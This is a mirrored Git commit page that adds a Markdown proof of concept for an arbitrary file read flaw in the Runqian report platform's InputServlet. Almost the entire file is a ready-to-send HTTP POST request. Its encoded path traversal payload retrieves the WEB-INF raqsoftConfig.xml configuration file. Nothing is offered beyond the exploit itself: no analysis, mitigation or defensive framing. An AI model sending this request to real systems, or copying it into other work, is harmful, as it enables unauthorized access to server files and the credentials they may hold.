mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 润乾报表平台InputServlet存在任意文件读取漏洞.md
This commit is contained in:
parent
1a3a5b2b10
commit
fa287f9eaf
14
润乾报表平台InputServlet存在任意文件读取漏洞.md
Normal file
14
润乾报表平台InputServlet存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## 润乾报表平台InputServlet存在任意文件读取漏洞
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /InputServlet?action=13 HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
|
||||||
|
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user